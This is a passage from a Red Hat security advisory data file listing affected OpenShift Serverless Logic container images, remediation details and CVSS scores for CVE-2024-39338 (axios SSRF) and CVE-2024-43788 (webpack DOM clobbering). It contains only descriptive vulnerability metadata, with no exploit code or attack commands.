"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-39338", }, { category: "external", summary: "RHBZ#2304369", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304369", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-39338", url: "https://www.cve.org/CVERecord?id=CVE-2024-39338", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-39338", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-39338", }, { category: "external", summary: "https://github.com/axios/axios/releases", url: "https://github.com/axios/axios/releases", }, { category: "external", summary: "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html", url: "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html", }, ], release_date: "2024-08-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-14T00:59:58+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8023", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "HIGH", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", version: "3.1", }, products: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "axios: axios: Server-Side Request Forgery", }, { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-14T00:59:58+00:00", details: "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64", "8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le", 